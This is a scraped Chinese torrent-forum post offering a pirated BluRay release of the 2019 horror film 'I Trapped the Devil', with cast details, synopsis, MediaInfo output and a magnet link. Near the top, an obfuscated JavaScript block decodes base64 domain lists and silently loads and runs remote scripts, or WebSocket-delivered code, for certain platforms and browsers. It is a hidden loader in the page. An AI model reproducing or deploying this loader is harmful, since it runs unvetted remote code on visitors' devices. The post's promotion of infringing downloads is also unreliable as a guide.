我制服了魔鬼[双语字幕]I.Trapped.the.Devil.2019.1080p.BluRay.DTS.x265-10bit-迅雷下载 8.43GB

版主小s 15天前 340

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 我制服了魔鬼 / A Man in the Dark
◎片  名 I Trapped the Devil
◎年  代 2019
◎产  地 美国
◎类  别 恐怖
◎语  言 英语
◎上映日期 2019-04-12(Imagine Film Festival)
◎IMDb评分  4.8/10 from 2085 users
◎IMDb链接  https://www.imdb.com/title/tt8708304
◎豆瓣评分 3.2/10 from 208 users
◎豆瓣链接 https://movie.douban.com/subject/33389322/
◎片  长 82分钟
◎导  演 乔许·罗博 Josh Lobo  
◎编  剧 乔许·罗博 Josh Lobo  
◎主  演 克里斯·沙利文 Chris Sullivan
       乔赛琳·唐娜休 Jocelin Donahue
       AJ·鲍恩 AJ Bowen


◎标  签 恐怖 | 美国 | 2019 | 悬疑 | 美国电影 | 犯罪 | 差 | 恶魔

◎简  介  

  Christmas is supposed to be a time for peace and joyful family reunions. But when Matt and his wife Karen show up unannounced at the home of his estranged brother Steve to celebrate the holidays, they are instead greeted with a horrifying surprise: trapped in the basement is a man. But not just any man. Steve believes that his hostage is none other than the devil himself.

  1. General
  2. Unique ID                                : 195526251342816220437757845406485009796 (0x9318FC7A0F6BF89F5CAEA251B7675584)
  3. Complete name                            : [email protected]Q.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 8.43 GiB
  7. Duration                                 : 1 h 23 min
  8. Overall bit rate                         : 14.4 Mb/s
  9. Movie name                               : I Trapped the Devil 2019 1080p BluRay DTS [email protected]
  10. Encoded date                             : UTC 2021-07-19 00:07:48
  11. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  12. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@High
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 23 min
  20. Bit rate                                 : 12.8 Mb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 808 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 23.976 (24000/1001/53354) FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.345
  30. Stream size                              : 7.52 GiB (89%)
  31. Title                                    : [email protected]
  32. Writing library                          : x265 - H.265/HEVC codec
  33. Default                                  : Yes
  34. Forced                                   : No
  35. Audio
  36. ID                                       : 2
  37. Format                                   : DTS
  38. Format/Info                              : Digital Theater Systems
  39. Codec ID                                 : A_DTS
  40. Duration                                 : 1 h 23 min
  41. Bit rate mode                            : Constant
  42. Bit rate                                 : 1 509 kb/s
  43. Channel(s)                               : 6 channels
  44. Channel layout                           : C L R Ls Rs LFE
  45. Sampling rate                            : 48.0 kHz
  46. Frame rate                               : 93.750 FPS (512 SPF)
  47. Bit depth                                : 24 bits
  48. Compression mode                         : Lossy
  49. Stream size                              : 905 MiB (10%)
  50. Title                                    : English
  51. Language                                 : English
  52. Default                                  : Yes
  53. Forced                                   : No
  54. Text #1
  55. ID                                       : 3
  56. Format                                   : PGS
  57. Muxing mode                              : zlib
  58. Codec ID                                 : S_HDMV/PGS
  59. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  60. Duration                                 : 1 h 16 min
  61. Bit rate                                 : 14.3 kb/s
  62. Count of elements                        : 753
  63. Stream size                              : 7.86 MiB (0%)
  64. Title                                    : CHS
  65. Language                                 : Chinese
  66. Default                                  : Yes
  67. Forced                                   : No
  68. Text #2
  69. ID                                       : 4
  70. Format                                   : PGS
  71. Muxing mode                              : zlib
  72. Codec ID                                 : S_HDMV/PGS
  73. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  74. Duration                                 : 1 h 16 min
  75. Bit rate                                 : 14.6 kb/s
  76. Count of elements                        : 753
  77. Stream size                              : 7.98 MiB (0%)
  78. Title                                    : CHT
  79. Language                                 : Chinese
  80. Default                                  : No
  81. Forced                                   : No
  82. Text #3
  83. ID                                       : 5
  84. Format                                   : PGS
  85. Muxing mode                              : zlib
  86. Codec ID                                 : S_HDMV/PGS
  87. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  88. Duration                                 : 1 h 16 min
  89. Bit rate                                 : 22.3 kb/s
  90. Count of elements                        : 754
  91. Stream size                              : 12.2 MiB (0%)
  92. Title                                    : CHS&ENG
  93. Language                                 : Chinese
  94. Default                                  : No
  95. Forced                                   : No
  96. Text #4
  97. ID                                       : 6
  98. Format                                   : PGS
  99. Muxing mode                              : zlib
  100. Codec ID                                 : S_HDMV/PGS
  101. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  102. Duration                                 : 1 h 16 min
  103. Bit rate                                 : 22.5 kb/s
  104. Count of elements                        : 754
  105. Stream size                              : 12.3 MiB (0%)
  106. Title                                    : CHT&ENG
  107. Language                                 : Chinese
  108. Default                                  : No
  109. Forced                                   : No
  110. Menu
  111. 00:00:00.000                             : en:Chapter 01
  112. 00:06:18.962                             : en:Chapter 02
  113. 00:14:42.131                             : en:Chapter 03
  114. 00:21:58.359                             : en:Chapter 04
  115. 00:28:42.387                             : en:Chapter 05
  116. 00:34:55.844                             : en:Chapter 06
  117. 00:43:06.626                             : en:Chapter 07
  118. 00:49:46.192                             : en:Chapter 08
  119. 00:57:49.174                             : en:Chapter 09
  120. 01:04:14.851                             : en:Chapter 10
  121. 01:10:35.982                             : en:Chapter 11
  122. 01:14:26.504                             : en:Chapter 12


TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:C600C0A174B710FE83FF1D3D2F22759F30CA579E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回